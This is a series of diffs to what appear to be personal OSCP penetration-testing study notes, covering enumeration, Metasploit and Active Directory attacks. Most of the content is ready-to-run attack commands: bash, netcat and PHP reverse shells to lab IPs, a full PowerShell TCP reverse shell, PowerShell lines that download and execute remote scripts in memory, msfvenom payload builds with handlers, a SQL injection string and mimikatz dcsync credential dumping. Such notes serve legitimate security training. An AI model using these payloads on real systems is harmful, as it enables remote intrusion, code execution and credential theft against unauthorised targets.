dec0mrad3 · June 30, 2021 03:15 · Jun 15, 2020 · Jun 11, 2020 · May 29, 2020 · May 17, 2020
diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -862,176 +862,6 @@ Invoke-EnumerateLocalAdmin | Format-Table
 privilege::debug
 lsadump::dcsync /domain:corp.com /all /csv
 ```
-# OWASP Checklist
-
-## Information Gathering
-
-	Manually explore the site
-	Spider/crawl for missed or hidden content
-	Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
-	Check the caches of major search engines for publicly accessible sites
-	Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
-	Perform Web Application Fingerprinting
-	Identify technologies used
-	Identify user roles
-	Identify application entry points
-	Identify client-side code
-	Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
-	Identify co-hosted and related applications
-	Identify all hostnames and ports
-	Identify third-party hosted content
-
-## Configuration Management
-
-	Check for commonly used application and administrative URLs
-	Check for old, backup and unreferenced files
-	Check HTTP methods supported and Cross Site Tracing (XST)
-	Test file extensions handling
-	Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
-	Test for policies (e.g. Flash, Silverlight, robots)
-	Test for non-production data in live environment, and vice-versa
-	Check for sensitive data in client-side code (e.g. API keys, credentials)
-
-## Secure Transmission
-
-	Check SSL Version, Algorithms, Key length
-	Check for Digital Certificate Validity (Duration, Signature and CN)
-	Check credentials only delivered over HTTPS
-	Check that the login form is delivered over HTTPS
-	Check session tokens only delivered over HTTPS
-	Check if HTTP Strict Transport Security (HSTS) in use
-
-## Authentication
-
-	Test for user enumeration
-	Test for authentication bypass
-	Test for bruteforce protection
-	Test password quality rules
-	Test remember me functionality
-	Test for autocomplete on password forms/input
-	Test password reset and/or recovery
-	Test password change process
-	Test CAPTCHA
-	Test multi factor authentication
-	Test for logout functionality presence
-	Test for cache management on HTTP (eg Pragma, Expires, Max-age)
-	Test for default logins
-	Test for user-accessible authentication history
-	Test for out-of channel notification of account lockouts and successful password changes
-	Test for consistent authentication across applications with shared authentication schema / SSO
-
-## Session Management
-
-	Establish how session management is handled in the application (eg, tokens in cookies, token in URL)
-	Check session tokens for cookie flags (httpOnly and secure)
-	Check session cookie scope (path and domain)
-	Check session cookie duration (expires and max-age)
-	Check session termination after a maximum lifetime
-	Check session termination after relative timeout
-	Check session termination after logout
-	Test to see if users can have multiple simultaneous sessions
-	Test session cookies for randomness
-	Confirm that new session tokens are issued on login, role change and logout
-	Test for consistent session management across applications with shared session management
-	Test for session puzzling
-	Test for CSRF and clickjacking
-
-## Authorization
-
-	Test for path traversal
-	Test for bypassing authorization schema
-	Test for vertical Access control problems (a.k.a. Privilege Escalation)
-	Test for horizontal Access control problems (between two users at the same privilege level)
-	Test for missing authorization
-
-## Data Validation
-
-	Test for Reflected Cross Site Scripting
-	Test for Stored Cross Site Scripting
-	Test for DOM based Cross Site Scripting
-	Test for Cross Site Flashing
-	Test for HTML Injection
-	Test for SQL Injection
-	Test for LDAP Injection
-	Test for ORM Injection
-	Test for XML Injection
-	Test for XXE Injection
-	Test for SSI Injection
-	Test for XPath Injection
-	Test for XQuery Injection
-	Test for IMAP/SMTP Injection
-	Test for Code Injection
-	Test for Expression Language Injection
-	Test for Command Injection
-	Test for Overflow (Stack, Heap and Integer)
-	Test for Format String
-	Test for incubated vulnerabilities
-	Test for HTTP Splitting/Smuggling
-	Test for HTTP Verb Tampering
-	Test for Open Redirection
-	Test for Local File Inclusion
-	Test for Remote File Inclusion
-	Compare client-side and server-side validation rules
-	Test for NoSQL injection
-	Test for HTTP parameter pollution
-	Test for auto-binding
-	Test for Mass Assignment
-	Test for NULL/Invalid Session Cookie
-
-## Denial of Service
-
-	Test for anti-automation
-	Test for account lockout
-	Test for HTTP protocol DoS
-	Test for SQL wildcard DoS
-
-## Business Logic
-
-	Test for feature misuse
-	Test for lack of non-repudiation
-	Test for trust relationships
-	Test for integrity of data
-	Test segregation of duties
-
-## Cryptography
-
-	Check if data which should be encrypted is not
-	Check for wrong algorithms usage depending on context
-	Check for weak algorithms usage
-	Check for proper use of salting
-	Check for randomness functions
-
-## Risky Functionality - File Uploads
-
-	Test that acceptable file types are whitelisted
-	Test that file size limits, upload frequency and total file counts are defined and are enforced
-	Test that file contents match the defined file type
-	Test that all file uploads have Anti-Virus scanning in-place.
-	Test that unsafe filenames are sanitised
-	Test that uploaded files are not directly accessible within the web root
-	Test that uploaded files are not served on the same hostname/port
-	Test that files and other media are integrated with the authentication and authorisation schemas
-
-## Risky Functionality - Card Payment
-
-	Test for known vulnerabilities and configuration issues on Web Server and Web Application
-	Test for default or guessable password
-	Test for non-production data in live environment, and vice-versa
-	Test for Injection vulnerabilities
-	Test for Buffer Overflows
-	Test for Insecure Cryptographic Storage
-	Test for Insufficient Transport Layer Protection
-	Test for Improper Error Handling
-	Test for all vulnerabilities with a CVSS v2 score > 4.0
-	Test for Authentication and Authorization issues
-	Test for CSRF
-
-## HTML 5
-
-	Test Web Messaging
-	Test for Web Storage SQL injection
-	Check CORS implementation
-	Check Offline Web Application
 
 # Powershell Unrestricted Executin Policy bypass
 ```

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -305,7 +305,7 @@ for host in $(cat  ips.txt); do echo -e "---------\nhost:$host\n-----------";snm
 
 ## Priv escalation
 ### Reverse shell
-		bash -i >& /dev/tcp/10.11.0.76/444 0>&1
+		bash -i >& /dev/tcp/10.1.1.246/443 0>&1
 		rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.114.137 443 >/tmp/f
 	Add SSH keys: ssh-keygen -t rsa -b 2048
 	root.c:
@@ -458,6 +458,7 @@ Windows                 You will not see a Linux prompt
 ```
 <?php shell_exec("bash -i >& /dev/tcp/10.11.0.61/5555 0>&1") ?>
 
+<?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?>
 <?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?>
 
 <?php $sock=fsockopen("10.11.0.61",5555);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -3,7 +3,10 @@
  ## Tools
 
 
-
+## SQL Injection
+```
+' or '1' ='1' --
+```
 ## Website Directory Enumeration
 
 

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -160,7 +160,7 @@ nmap -sC -sS -p0-65535 sandbox.local --open -oG sandboxlocal.grep -oX sandboxloc
 			//192.168.186.147 (commands - list, dir,  mget * )
 		rpcclient -U "" 192.168.1.1
 		smbclient -U testuser //localhost/report-upload/
-		smbclient -N -L \\\\
+		smbclient -N -L \\\\10.11.1.31
 			no password, hit <Enter>
 			if logged try srvinfo
 		enum4linux -v 192.168.152.109

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -1,7 +1,7 @@
  # Discovery
 
  ## Tools
- https://github.com/frizb/Vanquish
+ 	
 
 
 ## Website Directory Enumeration
@@ -10,6 +10,7 @@
 ### Dirsearch
 This is a great tool
 ```
+sudo dirsearch -u http://$IP/books -E -R 3 -x 403,301,302 --header "User-Agent: Googlebot-Image" --plain-text-report=dirsearch_10.11.1.123_scan.txt
 sudo dirsearch -u http://$IP/books -e php -R 3 -x 403,301,302 --plain-text-report=dirsearch_10.11.1.123_scan.txt
 
 ```

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -6,12 +6,14 @@
 
 ## Website Directory Enumeration
 
+
 ### Dirsearch
 This is a great tool
 ```
 sudo dirsearch -u http://$IP/books -e php -R 3 -x 403,301,302 --plain-text-report=dirsearch_10.11.1.123_scan.txt
 
 ```
+![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_May_14_2020_1589483580178.png)
 ### Opendoor
 This is a multithreaded python program to scan for files on web servers
 

diff --git a/images---Thu_May_14_2020_1589483580178.png b/images---Thu_May_14_2020_1589483580178.png
diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -6,6 +6,12 @@
 
 ## Website Directory Enumeration
 
+### Dirsearch
+This is a great tool
+```
+sudo dirsearch -u http://$IP/books -e php -R 3 -x 403,301,302 --plain-text-report=dirsearch_10.11.1.123_scan.txt
+
+```
 ### Opendoor
 This is a multithreaded python program to scan for files on web servers
 

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -413,6 +413,9 @@ msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe >
 $client = New-Object System.Net.Sockets.TCPClient("192.168.119.152",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
 ```
 
+```
+powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152:40000/Invoke-PowerShellTcp.ps1')"
+```
 ##### Kali Host
 ```
 sudo nc -nlvp 4242
@@ -559,7 +562,7 @@ exploit
 ```
 msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe
 
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.21; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit"
 ```
 
 ##### Widows reverse tcp 443
@@ -573,7 +576,7 @@ msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD win
 ```
 msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 -f raw > shell.jsp
 	
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD set PAYLOAD java/jsp_shell_reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD java/jsp_shell_reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; exploit"
 
 ```
 ##### All at once - Reverse TCP
@@ -823,9 +826,11 @@ set-executionpolicy unrestricted
 ```
 ## Powerview
 
-### Download ane execute in memory
+### Download and execute in memory
 ```
-powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152/powerview.ps1');Get-NetSession -ComputerName dc01 | Format-Table
+powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152/powerview.ps1');Get-NetSession -ComputerName dc01 | Format-Table"
+
+powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.152:40000/Invoke-PowerShellTcp.ps1')"
 ```
 ### See who is logged in to a domain controller
 ```

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -566,8 +566,14 @@ msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD wind
 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
 
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.220; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit"
+```
 
+##### JSP reverse tcp 443
+```
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 -f raw > shell.jsp
+	
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.222; set PAYLOAD set PAYLOAD java/jsp_shell_reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; exploit"
 
 ```
 ##### All at once - Reverse TCP

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -560,6 +560,15 @@ exploit
 msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe
 
 msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit"
+```
+
+##### Widows reverse tcp 443
+```
+msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.152 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
+
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.220; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit"
+
+
 ```
 ##### All at once - Reverse TCP
 set RHOST to the IP of the host you are attacking

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -558,6 +558,8 @@ exploit
 ##### Windows reverse tcp exe 40000
 ```
 msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe
+
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 40000; set AutoRunScript post/windows/manage/migrate; exploit"
 ```
 ##### All at once - Reverse TCP
 set RHOST to the IP of the host you are attacking

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -402,6 +402,10 @@ Kali                    nc -nv 192.168.152.10 4444
 
 ### Reverse shell
 
+#### Windows msfvenom exe reverse
+```
+msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe
+```
 #### Powershell Reverse Shell One Liner
 
 ##### Windows Host
@@ -466,6 +470,7 @@ https://github.com/Yt1g3r/CVE-2018-8174_EXP
 
 	Windows
 	msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
+	msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
 
 	Mac
 	msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
@@ -480,7 +485,7 @@ https://github.com/Yt1g3r/CVE-2018-8174_EXP
 	cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
 
 	ASP
-	msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
+	msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.152 LPORT=4444 -f asp > shell.asp
 
 	JSP
 	msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
@@ -550,11 +555,14 @@ set payload windows/meterpreter/reverse_tcp
 set lhost tun0
 exploit
 ```
-
+##### Windows reverse tcp exe 40000
+```
+msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.152 LPORT=40000 -f exe > tpc_rev_40000.exe
+```
 ##### All at once - Reverse TCP
 set RHOST to the IP of the host you are attacking
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit"
 
 msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit"
 
@@ -605,22 +613,22 @@ nc -nv 192.168.152.10 4444
 #### Generating the Payload
 ```
 msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 EXITFUNC=thread -e x86/xor_dynamic -b "\x00\x09\x0a\x1a\x10" -f python
-msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x09\x0a\x1a\x10" -f python
+msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4445 -e x86/shikata_ga_nai -b "\x00\x09\x0a\x1a\x10" -f python
 ```
 
 #### Connect to Bind Shell from multi handler
 
 ##### Create exploit to run on windows box (creating bind shell)
 Replace Lhost with the windows box you are attacking
 ```
-msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.13 LPORT=40000 -f exe > bind.exe
+msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.14 LPORT=40000 -f exe > bind.exe
 ```
 
 
 ##### Connect to the bind shell - Automatic
 Replace RHOST with the IP of the windows host you are attacking
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.13; set lport 40000; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.14; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.14; set lport 40000; exploit"
 ```
 
 ##### Connect to the bind shell - Manual

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -148,15 +148,17 @@ nmap -sC -sS -p0-65535 sandbox.local --open -oG sandboxlocal.grep -oX sandboxloc
 ```
 
 ## SMB (tcp 139, 445) enum:
-		smbclient -L //192.168.186.147 (commands - list, dir,  mget * )
+			//192.168.186.147 (commands - list, dir,  mget * )
 		rpcclient -U "" 192.168.1.1
 		smbclient -U testuser //localhost/report-upload/
+		smbclient -N -L \\\\
 			no password, hit <Enter>
 			if logged try srvinfo
 		enum4linux -v 192.168.152.109
 		nmap -p 139,445 --script smb-enum-users 192.168.1.0/24
 		nmap -p 135,139,445 --script smb-enum-shares 192.168.1.0/24
 		nmap -v -p 139,445 --script=smb-vuln-ms08-067 --script-args=unsafe=1 10.11.1.201
+		nmap -p 135,139,445 --script smb-*  --script-args=unsafe=1 -oX 
 
 
 		/root/mega/exploits/samba28 (made of 10.c) use exploit/linux/samba/trans2open (Unix Samba 2.2.0 to 2.2.8)
@@ -552,13 +554,15 @@ exploit
 ##### All at once - Reverse TCP
 set RHOST to the IP of the host you are attacking
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit"
+
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set LPORT 443; set AutoRunScript post/windows/manage/migrate; exploit"
 
 ```
 
 ##### All at once - Reverse HTTPS
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_https;  set LHOST tun0; set LPORT 8443; set AutoRunScript post/windows/manage/migrate; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/reverse_https;  set LHOST tun0; set LPORT 8443; set AutoRunScript post/windows/manage/migrate; exploit"
 
 ```
 #### Auto Migrate Process
@@ -609,14 +613,14 @@ msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/s
 ##### Create exploit to run on windows box (creating bind shell)
 Replace Lhost with the windows box you are attacking
 ```
-msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.73 LPORT=40000 -f exe > bind.exe
+msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.13 LPORT=40000 -f exe > bind.exe
 ```
 
 
 ##### Connect to the bind shell - Automatic
 Replace RHOST with the IP of the windows host you are attacking
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.73; set lport 40000; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.13; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.13; set lport 40000; exploit"
 ```
 
 ##### Connect to the bind shell - Manual

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -552,7 +552,7 @@ exploit
 ##### All at once - Reverse TCP
 set RHOST to the IP of the host you are attacking
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; set AutoRunScript post/windows/manage/migrate; exploit"
 
 ```
 

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -549,9 +549,16 @@ set lhost tun0
 exploit
 ```
 
-All at once:
+##### All at once - Reverse TCP
+set RHOST to the IP of the host you are attacking
 ```
-msfconsole -x "use exploit/multi/handler; set RHOST 192.168.152.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit"
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit"
+
+```
+
+##### All at once - Reverse HTTPS
+```
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/reverse_https;  set LHOST tun0; set LPORT 8443; set AutoRunScript post/windows/manage/migrate; exploit"
 
 ```
 #### Auto Migrate Process

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -554,7 +554,11 @@ All at once:
 msfconsole -x "use exploit/multi/handler; set RHOST 192.168.152.10; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.119.152; exploit"
 
 ```
-
+#### Auto Migrate Process
+Before you run exploit run this
+```
+set AutoRunScript post/windows/manage/migrate
+```
 ### Windows Bind Shell
 
 #### Using C to create a bind shell on Windows

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -594,6 +594,21 @@ msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp LPORT=4444 -e x86/s
 ```
 
 #### Connect to Bind Shell from multi handler
+
+##### Create exploit to run on windows box (creating bind shell)
+Replace Lhost with the windows box you are attacking
+```
+msfvenom -p windows/meterpreter/bind_tcp LHOST=10.11.1.73 LPORT=40000 -f exe > bind.exe
+```
+
+
+##### Connect to the bind shell - Automatic
+Replace RHOST with the IP of the windows host you are attacking
+```
+msfconsole -x "use exploit/multi/handler; set RHOST 10.11.1.73; set PAYLOAD windows/meterpreter/bind_tcp; set rhost 10.11.1.73; set lport 40000; exploit"
+```
+
+##### Connect to the bind shell - Manual
 ```
 sudo service postgresql start
 sudo msfdb init

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -131,7 +131,7 @@ You must prepend your commmand with proxychains.  Be sure you don't sue the nmap
 ```
 [kali@kali:~]$ proxychains nmap --top-ports=20 -sT -Pn 172.16.152.5
 ```
-
+## nmap
 
 ### Scan Top 20 ports
 ```
@@ -142,6 +142,11 @@ nmap -sT -A --top-ports 20 192.168.1.0/24 --open -oG top-port.txt
 
 	$ sudo nmap 192.168.152.44 -p- -sV -vv --open --reason -oX 192.168.152.44.xml
 
+### Scan all ports with default set of scripts and SYNC for faster run time
+```
+nmap -sC -sS -p0-65535 sandbox.local --open -oG sandboxlocal.grep -oX sandboxlocal.xml
+```
+
 ## SMB (tcp 139, 445) enum:
 		smbclient -L //192.168.186.147 (commands - list, dir,  mget * )
 		rpcclient -U "" 192.168.1.1

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -3,6 +3,7 @@
  ## Tools
  https://github.com/frizb/Vanquish
 
+
 ## Website Directory Enumeration
 
 ### Opendoor
@@ -86,6 +87,11 @@ This is a multithreaded python program to scan for files on web servers
 			 nmap --script=dns-zone-transfer -p 53 ns2.megacorpone.com
 		dnsenum
 		theharvester -d cisco.com -b google >google.txt		-Email harvest from google.com
+## Crackmap Exec cme
+This will return all windows hosts running smb and their window version + their domain (very quickly)
+```
+cme smb 10.11.1.0/24
+```
 ## Nmap
 
 ### Subnet scan with exlusion

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -955,6 +955,8 @@ set-executionpolicy unrestricted
 ```
 
 # Metasploit 
+Meterpreter cheat sheet:
+https://www.blueliv.com/downloads/Meterpreter_cheat_sheet_v0.1.pdf
 
 ## Nmap Scanning
 ```

diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -956,13 +956,24 @@ set-executionpolicy unrestricted
 
 # Metasploit 
 
+## Nmap Scanning
+```
+db_nmap 10.11.1.8 -A -Pn
+```
 ## Payload Types
 ![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587053138991.png)
 
-## Searching modules
+## Searching
+
+### modules
 
 	msf5 > search smb type:auxiliary
 
+### Payloads
+```
+search meterpreter type:payload
+```
+
 ## Cheatsheet
 ![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587051780275.png)
 ![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587051801949.png)
diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -954,7 +954,15 @@ lsadump::dcsync /domain:corp.com /all /csv
 set-executionpolicy unrestricted
 ```
 
-# Metasploit Cheatsheet
+# Metasploit 
 
+## Payload Types
+![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587053138991.png)
+
+## Searching modules
+
+	msf5 > search smb type:auxiliary
+
+## Cheatsheet
 ![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587051780275.png)
 ![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587051801949.png)
diff --git a/images---Thu_Apr_16_2020_1587053138991.png b/images---Thu_Apr_16_2020_1587053138991.png
diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -952,4 +952,9 @@ lsadump::dcsync /domain:corp.com /all /csv
 # Powershell Unrestricted Executin Policy bypass
 ```
 set-executionpolicy unrestricted
-```
+```
+
+# Metasploit Cheatsheet
+
+![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587051780275.png)
+![image](https://gist.github.com/ssstonebraker/f25e2f1f6458da6dc074a1e7af79b773/raw/images---Thu_Apr_16_2020_1587051801949.png)
diff --git a/images---Thu_Apr_16_2020_1587051801949.png b/images---Thu_Apr_16_2020_1587051801949.png
diff --git a/images---Thu_Apr_16_2020_1587051780275.png b/images---Thu_Apr_16_2020_1587051780275.png
diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -948,3 +948,8 @@ lsadump::dcsync /domain:corp.com /all /csv
 	Test for Web Storage SQL injection
 	Check CORS implementation
 	Check Offline Web Application
+
+# Powershell Unrestricted Executin Policy bypass
+```
+set-executionpolicy unrestricted
+```
diff --git a/OSCP_notes_brakertech.md b/OSCP_notes_brakertech.md
@@ -750,7 +750,11 @@ cmd /c echo y | plink.exe -batch -ssh -l kali -pw kali -R 192.168.119.152:1235:1
 ```
 
 # AD Enumeration
-
+## Powershell Notes
+Execution Policy Unrestricted
+```
+set-executionpolicy unrestricted
+```
 ## Powerview
 
 ### Download ane execute in memory